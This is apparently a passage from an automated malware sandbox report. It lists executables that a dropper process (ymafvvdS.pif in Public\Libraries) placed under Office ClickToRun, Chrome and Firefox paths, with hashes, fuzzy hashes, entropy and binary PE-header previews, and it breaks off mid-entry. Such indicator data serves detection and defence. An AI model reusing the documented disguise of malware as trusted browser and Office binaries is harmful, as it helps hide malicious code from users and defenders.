                                                                                                                                                                                                                        SHA1:8B4F093EB3319616699F9032CF4824B6F5214D94
                                                                                                                                                                                                                        SHA-256:1C2638068578216040E965B0E9ADD14864AD4AA20720FC38D1B4D941D8A9B04E
                                                                                                                                                                                                                        SHA-512:114C0DE4191FEDB96FADCE2DC01F0689CD7BB76B42F356C4BA2ACEAD7B775D0EFC08A08DB4538577119F91C6F4FEF5D032DC6F8098B6D64B664616196CBA8363
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........E@..$...$...$...\...$...V*..$...V-..$...V+..$...V/..$...$/.0 ...V&..$...V..$...V..$...V,..$..Rich.$..........PE..d...!!.R.........."......`..........0C.........@.............................P......#'.... .......... ......................................Xl..........X.......d.......................T...................8...(.......8...........`...`............................text...(X.......`.................. ..`.rdata..z....p... ...p..............@..@.data...............................@....pdata..d........ ..................@..@.rsrc...X...........................@..@.reloc...p.......`..................@...................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):5855744
                                                                                                                                                                                                                        Entropy (8bit):6.574327140983912
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:98304:xALuzDKnxCp3JKNrPJzruaI6HMaJTtGbbD527BWG:KaGg3cFPIaI6HMaJTtGbbVQBWG
                                                                                                                                                                                                                        MD5:77EFB5E3B328455943569E0598103B72
                                                                                                                                                                                                                        SHA1:602ED429499E2A4BF500B2E57B09FC4919FDA913
                                                                                                                                                                                                                        SHA-256:1C41AEC6D8F692556D948355DBF5244A337DFA13DA6189673359390F987FF1C2
                                                                                                                                                                                                                        SHA-512:B74C7D9F38ADEBF7DE4D8F953229AA2FD82E7C67B8EC5C6B0C621BFC697E165EF82EDD117A688A17523FF405A815E346BD8FBB83BE61B8C057178D25C3EB1367
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.......Jc.M.............p......nx......nx......).......)........p.......p.......p..&....p..............nx..i...kx......kx......kx..g...kxx.............kx......Rich....................PE..d....".e..........".... .z6..........32........@..............................Y.......Y... .................................................8.B.......K..a...PI..%..................0.B.8...................X.B.(.....7.@.............6.0.....B......................text....y6......z6................. ..`.rdata..5.....6......~6.............@..@.data...`....0G.......G.............@....pdata...%...PI..&...:I.............@..@.didat.. .....K......`K.............@..._RDATA..\.....K......fK.............@..@.rsrc....a....K..b...hK.............@..@.reloc........P.......O.............@...................................................................................................................

                                                                                                                                                                                                                        C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1312768
                                                                                                                                                                                                                        Entropy (8bit):5.3560414739981494
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24576:5Xr/SVMxW1sqjnhMgeiCl7G0nehbGZpbD:V1xADmg27RnWGj
                                                                                                                                                                                                                        MD5:61CEFA63E7EE27F5129C599D281B0BB5
                                                                                                                                                                                                                        SHA1:D537DC740C49AA57AD836AA58874F92102572E65
                                                                                                                                                                                                                        SHA-256:B5B49C7286DF0E34F5D582AE7552C2E62B6F35F20E3F2DF45A11D6502EE630FC
                                                                                                                                                                                                                        SHA-512:F148BD5888676673A7E9EC2FE9981ADB5AC7C596DBA21FC510D81C2A241C629B27A1225727228A1BD1E4D78B9F65E975899DA333B510CC3DF48AA0942DEBC56D
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........K.k...k...k.......k.......k.......k.......k...k..Ro.......k....l..k.......k....n..k.......k..Rich.k..........PE..L...9.A/.....................T......@V............@..........................P................... ......................................8............................_..T...............................@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...8...........................@..@.reloc...p.......`..................@...........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):27533312
                                                                                                                                                                                                                        Entropy (8bit):6.248635620725209
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:196608:phRrmpGpGdJM7Hbp8JfrCGvqYYuNDmoefAlprtPz25HqaI6HMaJTtGbQOvVQBWG:phRCpGpMJMrbp8JjpNdNlc5dB
                                                                                                                                                                                                                        MD5:8366F894666E016B5532B9406EB4A90B
                                                                                                                                                                                                                        SHA1:5E4BF99FF01723F88817F48E63C1DD23A334839B
                                                                                                                                                                                                                        SHA-256:E1CA49E666C0A6753F9D24D43BC33CD4A13165F670C38456608539FDA344711A
                                                                                                                                                                                                                        SHA-512:B07CCE2395ED55A7C1A9DA512FB8C60A4DF158622A3773E7E78767C08C3D3E1A4B79FBDEAB3A28AD65F0C2E0F7F63F432F617BC33690CA0AF06FB0D94D53BA15
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...................................H...........!..L.!This program cannot be run in DOS mode....$.......$.|+`{.x`{.x`{.xi..xv{.x...yf{.x...yj{.x...yd{.x...yO{.xG..xh{.xG.oxa{.x...yb{.x...ya{.x...ya{.x...yd{.x...yc{.x...y~{.x...y}{.x`{.xTs.x...ya{.x...yjz.x...y v.x...xa{.x`{.xa{.x...ya{.xRich`{.x........PE..d......e..........".... .....H.................@....................................X/.... ..................................................u..D.... ?...X...7.........................8....................U..(...`...@............0.. "..l .......................text............................... ..`.rdata..S.~..0....~.................@..@.data.........1.......0.............@....pdata........7.......7.............@..@.didat..`.....>.......>.............@....detourc.!....>.."....>.............@..@.rsrc.....X.. ?...X...>.............@..@.reloc..............................@...........................................................................................

                                                                                                                                                                                                                        C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):2199552
                                                                                                                                                                                                                        Entropy (8bit):6.788991366078409
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:49152:j83pZ3kd0CuEeN0LUmRXzYs65mXDmg27RnWGj:zKuUQY15kD527BWG
                                                                                                                                                                                                                        MD5:7B53E1DCF6EB15F86FBA53A37F239978
                                                                                                                                                                                                                        SHA1:3F4E27861F04AB48BDE341ADF2BAFBF7235B29DC
                                                                                                                                                                                                                        SHA-256:514804FED7FA0BFBF58162875B6EA8C91D4F550AF2ECA9C9E6082C2447EA1FEF
                                                                                                                                                                                                                        SHA-512:2AE72DB3ADA492590F0D75DDC272ECE377DECE5249E281799318E88E61D2BD442FB218E88F435CA3FE01D806B7A33E1F92DCAABCF91F85369561857AD849BD0D
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......D................7......................!..............~............Y.......[............Rich............PE..d...rq............"..................$.........@..............................!......!... .......... ......................................P...|....p... ......L....................a..T...................Xt..(... s..8............t...............................text...6........................... ..`.rdata..............................@..@.data...@...........................@....pdata..L...........................@..@.rsrc.... ...p...0...P..............@..@.reloc... ..........................@...................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):4971008
                                                                                                                                                                                                                        Entropy (8bit):6.670828897455733
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:49152:mErw1zDb1mZtOoGpDYdSTtWXy4eqH8nYAmoBvYQugWupoI6bAGOpndOPcptz6+MG:4A4oGlcR+glEdOPKzgVZJD527BWG
                                                                                                                                                                                                                        MD5:8E60DF36F025752E3837B68006F6EE03
                                                                                                                                                                                                                        SHA1:8175D381E64FA49C58D1311CE46EB5B6F9984D47
                                                                                                                                                                                                                        SHA-256:06A718003D8FB347E2CEC24E1E0EB25A8BB23E686741FE60E9C0664415677DB4
                                                                                                                                                                                                                        SHA-512:6EEBDC4DBE0E925F3E8422E0380657A8B6B5BD09E6B3BE0AC75F853B2673CE0E17710A4347B5404303B76A0B967B6446E94F3CB1145B012906C79A78A19145C8
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......Eh.<..{o..{o..{o.q.o..{oaszn..{oas~n*.{oas.n..{oasxn..{o.{}n..{o.{xn..{o.{.n..{o.{zn..{o..zo..{odsxn..{ods~n..{odsrnF.{ods.o..{o...o..{odsyn..{oRich..{o........PE..d...0m.d..........".... ..-.........0p+........@..............................L.......L... .................................................HZ:.......B.......@.<C....................:.8...................p.9.(... P..@.............-......H:.@....................text...[.-.......-................. ..`.rdata..9.....-.......-.............@..@.data...x....`>......>>.............@....pdata..<C....@..D....@.............@..@.didat..`.....B......LB.............@....rsrc.........B......PB.............@..@.reloc........B......ZB.............@...........................................................................................................................................................................

                                                                                                                                                                                                                        C:\Program Files\Google\Chrome\Application\117.0.5938.134\Installer\chrmstp.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):4897792
                                                                                                                                                                                                                        Entropy (8bit):6.829761399189547
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:49152:X8ErDqTGsitHloGgkiDrCvJVZfEcpwD06LgVCM2hnwLNwiHaGI3Y/685ZYMaWgK8:sv2gM+qwXLg7pPgw/DSZ9CD527BWG
                                                                                                                                                                                                                        MD5:A0C0F490D9E9EF2967964E83191BD024
                                                                                                                                                                                                                        SHA1:BA8C489D24EB897A6112B411AD0AA7F49719001A
                                                                                                                                                                                                                        SHA-256:A2AED593E6BD6A2E7986BDC47FCF131797F2E03BD3C9FA228D0A6652DF972509
                                                                                                                                                                                                                        SHA-512:93D3A4038380C4B12C68C3D5C7583B579FF6F68AF137EB0BBA24320FB0E91E72D7AD4C5A23F54593FAB56C7593A4A8DA240B9F1BFE42527CD2F279487A0285B0
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....|.e.........."......D/......... ..........@..............................L.....DuK... ...........................................6.N.....6.......<......P:.l.....................6......................6.(...`s/.@.............6.8.....6.@....................text....C/......D/................. ..`.rdata......`/......H/.............@..@.data...4:....8.......7.............@....pdata..l....P:.......9.............@..@.00cfg..0.....;.......:.............@..@.gxfg....1....;..2....:.............@..@.retplne.....0<.......:..................tls....A....@<.......:.............@...CPADinfo8....P<.......:.............@...LZMADEC......`<.......:............. ..`_RDATA..\.....<.......:.............@..@malloc_h......<.......:............. ..`.rsrc.........<.......:.............@..@.reloc... ...`C.......A.............@...........................................................

                                                                                                                                                                                                                        C:\Program Files\Google\Chrome\Application\117.0.5938.134\Installer\setup.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):4897792
                                                                                                                                                                                                                        Entropy (8bit):6.8297644721829
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:49152:i8ErDqTGsitHloGgkiDrCvJVZfEcpwD06LgVCM2hnwLNwiHaGI3Y/685ZYMaWgK8:/v2gM+qwXLg7pPgw/DSZ9CD527BWG
                                                                                                                                                                                                                        MD5:15EEAC18C48706C3F6E62028D9BC6838
                                                                                                                                                                                                                        SHA1:DB17DF051CF261EE32F6D63A881F960EC2A5B555
                                                                                                                                                                                                                        SHA-256:9B28F8546DA706BA487A2EDBA31683C46A0993952FA4FEF696230196A9961D75
                                                                                                                                                                                                                        SHA-512:16D0FA117C04DEE2248C941A52DEA350B9550B9C08CC86BBCB37B48FCE670FA72BE88E5132B94E787C5777A41BC2FAC6FB8678774F8519197010DA8F03719774
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....|.e.........."......D/......... ..........@..............................L.......K... ...........................................6.N.....6.......<......P:.l.....................6......................6.(...`s/.@.............6.8.....6.@....................text....C/......D/................. ..`.rdata......`/......H/.............@..@.data...4:....8.......7.............@....pdata..l....P:.......9.............@..@.00cfg..0.....;.......:.............@..@.gxfg....1....;..2....:.............@..@.retplne.....0<.......:..................tls....A....@<.......:.............@...CPADinfo8....P<.......:.............@...LZMADEC......`<.......:............. ..`_RDATA..\.....<.......:.............@..@malloc_h......<.......:............. ..`.rsrc.........<.......:.............@..@.reloc... ...`C.......A.............@...........................................................

                                                                                                                                                                                                                        C:\Program Files\Google\Chrome\Application\117.0.5938.134\chrome_pwa_launcher.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):2156544
                                                                                                                                                                                                                        Entropy (8bit):6.953576455536211
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24576:ntjqL8fH+8aUbp8D/8+xQWAcsqjnhMgeiCl7G0nehbGZpbD:tjKK+81FI/85iDmg27RnWGj
                                                                                                                                                                                                                        MD5:EE6C03C908B23E31DF257B97DCD60660
                                                                                                                                                                                                                        SHA1:5323738E4D161D6C05378C58D1A0131FF21875EF
                                                                                                                                                                                                                        SHA-256:6414FD7B2083F2D70BA9FC6CA405FCEF74430B623D828CACA9226CDB1F7838F3
                                                                                                                                                                                                                        SHA-512:BA8B8FD86639F7B8AA6B5CCC2C47B2DEA3E78BD67EB9A56CE8D5C8E97F587063794C3F41127A9B0040E44DAFC9BD094BC0644B7ECD1366D5BA4136CBBE379127
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....|.e.........."......F.....................@.............................P".....`.!... ..........................................X..\...$Y....... ...&......(...................lM......................PL..(...pr..@............_...............................text....D.......F.................. ..`.rdata..$....`.......J..............@..@.data...,.... ......................@....pdata..(...........................@..@.00cfg..0...........................@..@.gxfg....,..........................@..@.retplne.................................tls................................@...LZMADEC............................. ..`_RDATA..\...........................@..@malloc_h............................ ..`.rsrc....&... ...(..................@..@.reloc.......P......................@...................................................................................................

                                                                                                                                                                                                                        C:\Program Files\Google\Chrome\Application\117.0.5938.134\elevation_service.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):2370560
                                                                                                                                                                                                                        Entropy (8bit):7.032375579812476
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:49152:sAMsOu3JfCIGnZuTodRFYKBrFxbWp4Dmg27RnWGj:sAMa38ZuTS7D527BWG
                                                                                                                                                                                                                        MD5:9C0AEE5B556B514D8FFE9DAF726DD2C7
                                                                                                                                                                                                                        SHA1:31367F0DD58887C57032307F324E71D8D472591C
                                                                                                                                                                                                                        SHA-256:C39C665284EFE46D4F33719A482AC207B7E9D9A5B9D80230EFBE70DED4DC1B43
                                                                                                                                                                                                                        SHA-512:DC42DBB1603400987398A303F1412475790BC1DF3D77B8CD9222E59BB8044EAA358B3C512204B70DEBA1620FAAA767511DC8A07A2881AD28C5E0C984F8B61C1D
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....|.e..........".................0..........@..............................%.....Z.$... ..........................................}..Z...Z}...............@..`...................$k.......................j..(.......@............... ............................text...V........................... ..`.rdata..Hv.......x..................@..@.data...t....`.......>..............@....pdata..`....@.......6..............@..@.00cfg..0...........................@..@.gxfg....+.......,..................@..@.retplne.....@...........................tls....A....P......................@..._RDATA..\....`....... ..............@..@malloc_h.....p.......".............. ..`.rsrc................$..............@..@.reloc...............<..............@...........................................................................................................................................

                                                                                                                                                                                                                        C:\Program Files\Google\Chrome\Application\117.0.5938.134\notification_helper.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1984512
                                                                                                                                                                                                                        Entropy (8bit):7.104324901146362
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24576:XwbK7tnhD4aH6wD2Krx5NgOOagtE8FUsqjnhMgeiCl7G0nehbGZpbD:XSK7Fhslq2EPfOfEpDmg27RnWGj
                                                                                                                                                                                                                        MD5:7BDD695D51D5248ABAD94BCC5FDFD7C3
                                                                                                                                                                                                                        SHA1:80F3DCF77D4B87F1FC5D6D8FC87F33FBDC9E56AB
                                                                                                                                                                                                                        SHA-256:6743D58688653C0AE4E084E93B186EDBBD5E8290AFA1C4855906B0FD504BB588
                                                                                                                                                                                                                        SHA-512:2C7321C1567F677B5BD2170B8A085154B4D01A1E17069BAF01B7895A9B4A200F99AD7F0736EA2F5F8DFBF1B16B0D3702D360267B7FEA49F511BAB0635666CE92
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....|.e.........."............................@....................................o..... ............................................\...$................p..t...............................................(...P...@...........x...x............................text............................... ..`.rdata..............................@..@.data................z..............@....pdata..t....p.......x..............@..@.00cfg..0...........................@..@.gxfg...@-... ......................@..@.retplne.....P.......D...................tls.........`.......F..............@...CPADinfo8....p.......H..............@..._RDATA..\............J..............@..@malloc_h.............L.............. ..`.rsrc................N..............@..@.reloc...............X..............@...................................................................................................

                                                                                                                                                                                                                        C:\Program Files\Google\Chrome\Application\chrome_proxy.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1779712
                                                                                                                                                                                                                        Entropy (8bit):7.158054727593673
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24576:7KI7Twj5KDHxJ1FxyD+/wsG1TbbcUsqjnhMgeiCl7G0nehbGZpbD:7v7e0j31mD+/wDfbbDmg27RnWGj
                                                                                                                                                                                                                        MD5:72CF331A76CD25E0F135A6FAF35FB25F
                                                                                                                                                                                                                        SHA1:05EF0F9395E5D62BF55E29B9274824187F8B480E
                                                                                                                                                                                                                        SHA-256:FB0624494835538D7FD5F719FEF2D68BDDFE902C3AA0A8A837694E783961274B
                                                                                                                                                                                                                        SHA-512:C2382E020F549787F7EDA83CBD13DC909B4F99E093ECAA6355EA01AFEC8378FBBE7458C8E1111A2C499B621167533D13E8DB3D2EDECF7E2D0D0FD3559D573A1D
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....|.e.........."..........B.................@.......................................... .........................................X...U...............x....p.................................................(...`2..@...............X............................text............................... ..`.rdata..,w... ...x..................@..@.data...............................@....pdata......p.......x..............@..@.00cfg..0...........................@..@.gxfg....).......*..................@..@.retplne.....@.......&...................tls.........P.......(..............@..._RDATA..\....`.......*..............@..@malloc_h.....p.......,.............. ..`.rsrc...x...........................@..@.reloc...............8..............@...........................................................................................................................................

                                                                                                                                                                                                                        C:\Program Files\Mozilla Firefox\crashreporter.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1378304
                                                                                                                                                                                                                        Entropy (8bit):5.377418837432717
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12288:0QUVPDHhSTXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kw:PyhSTsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                        MD5:78A6612E4D07F32C9FEA6BA8D8061F25
                                                                                                                                                                                                                        SHA1:EDDE46029E48AF1C84C02EF123F8F80BD214DE43
                                                                                                                                                                                                                        SHA-256:BF176E1FCDC2A8C1915F79A7F302B9781266175B8BFACDA0CB34B538CE886E4E
                                                                                                                                                                                                                        SHA-512:F6F0F99CC5EACBBAFA7774E92C674CE4DA51223F56F84B0804160C0E4E0DE373C95A2031904F9D85D1CC257DCCB1FFF41900D52B695103268BA4A6FC3D5B0A88
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."............................@.............................p.......@.... ..................................................................P......................T...........................(...p...8...........H................................text............................... ..`.rdata...h.......j..................@..@.data........@......................@....pdata.......P.......0..............@..@.00cfg..(....`.......@..............@..@.tls.........p.......B..............@....voltbl..............D...................rsrc................F..............@..@.reloc...P... ...@..................@...................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Program Files\Mozilla Firefox\default-browser-agent.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1286656
                                                                                                                                                                                                                        Entropy (8bit):7.22209984446946
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24576:qsFfc1VyFn5UQn652bO4HMsqjnhMgeiCl7G0nehbGZpbD:qsFcIn5rJSDmg27RnWGj
                                                                                                                                                                                                                        MD5:0B59664A2C1E61586FE9DAAE6D4FDEAE
                                                                                                                                                                                                                        SHA1:079A9E945AFE0E1CAE1A160982744FE72F6821D7
                                                                                                                                                                                                                        SHA-256:15E7FBC759539CA7B1F44B4F0F4807DC07BBAD6914EF1D64B359875CF971AF46
                                                                                                                                                                                                                        SHA-512:E0F70C8AF3D4428AA81BFCDA1C5A02ACB53C61C00E272F1AF9E68FEAF3D7832469042D38144ECE179AF88D40F7A73BDA40C10C15D9848CC2887377C9DC29B58F
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......6..........pX.........@.......................................... ..........................................J.......K..........`........%..................DA..........................(...`...8............V...............................text...V5.......6.................. ..`.rdata...O...P...P...:..............@..@.data...............................@....pdata...%.......&..................@..@.00cfg..(...........................@..@.tls................................@....voltbl..................................rsrc...`...........................@..@.reloc....... ......................@...................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Program Files\Mozilla Firefox\firefox.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1246208
                                                                                                                                                                                                                        Entropy (8bit):7.49426392990658
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24576:Ot9o6p4xQbiKI69wpemIwpel9XsqjnhMgeiCl7G0nehbGZpbD:Ot9faQbtl2peapel1Dmg27RnWGj
                                                                                                                                                                                                                        MD5:EF735D7409066638675EAD964C8D29FA
                                                                                                                                                                                                                        SHA1:5D224E431D3DA4B3402FD0074819FFC258801188
                                                                                                                                                                                                                        SHA-256:4299591410BD2EE96B0D14C4131CAACA2AEBD138791EA41151FE8B24B47264BD
                                                                                                                                                                                                                        SHA-512:6A7D16E12F41E6F556BE5B6409FF97136E14648F8E763D87A4D840360AA7BA42F2523A1A7F9AF0E8719BDC477839B2EEA162DC1153C63A2C648FFAD52229622D
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......$.....................@....................................?..... .................................................g...h............P..t%..................4........................k..(....@..8...........P...........@....................text....".......$.................. ..`.rdata.......@.......(..............@..@.data...p+... ......................@....pdata..t%...P...&..................@..@.00cfg..(............2..............@..@.freestd.............4..............@..@.retplne$............6...................tls.................8..............@....voltbl..............:...................rsrc................<..............@..@.reloc...............$..............@...................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Program Files\Mozilla Firefox\maintenanceservice.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1356800
                                                                                                                                                                                                                        Entropy (8bit):5.347825226792433
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24576:5QVTZu0JksqjnhMgeiCl7G0nehbGZpbD:aVTZuFDmg27RnWGj
                                                                                                                                                                                                                        MD5:B43EC32DD8CD568FB3D85089F03263A6
                                                                                                                                                                                                                        SHA1:C2281DA021340FB0A49FFBC3EF65D38F2CF9EFEB
                                                                                                                                                                                                                        SHA-256:A571479AAB90AC7869236A0AB6F515231189564E66C286CFD03C78F94A8B99D2
                                                                                                                                                                                                                        SHA-512:A3B3202CF1F1D0585DF96C8A35B6343E6B32024AFE2D51CBE913ACD7038007148CB0C7E0CB1FCBCA67523208546B5810DD2B0B5C1E50BDD68D747FF7FD529DA6
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......R...$.................@.............................P.......,.... .................................................h&..................`....................$..........................(....p..8............,...............................text...FQ.......R.................. ..`.rdata.......p.......V..............@..@.data...4#...`.......<..............@....pdata..`............J..............@..@.00cfg..(............d..............@..@.tls.................f..............@....voltbl.*............h.................._RDATA...............j..............@..@.rsrc................l..............@..@.reloc...P.......@...t..............@...........................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Program Files\Mozilla Firefox\minidump-analyzer.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1344000
                                                                                                                                                                                                                        Entropy (8bit):6.808351155277148
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24576:9C1vpgXcZHzOsqjnhMgeiCl7G0nehbGZpbD:9C1vpIcNiDmg27RnWGj
                                                                                                                                                                                                                        MD5:D2A2575FDC296E3DA8C9EC7AA924F631
                                                                                                                                                                                                                        SHA1:88DAC87B44D5A803D5C7D945092A792E953B7EB4
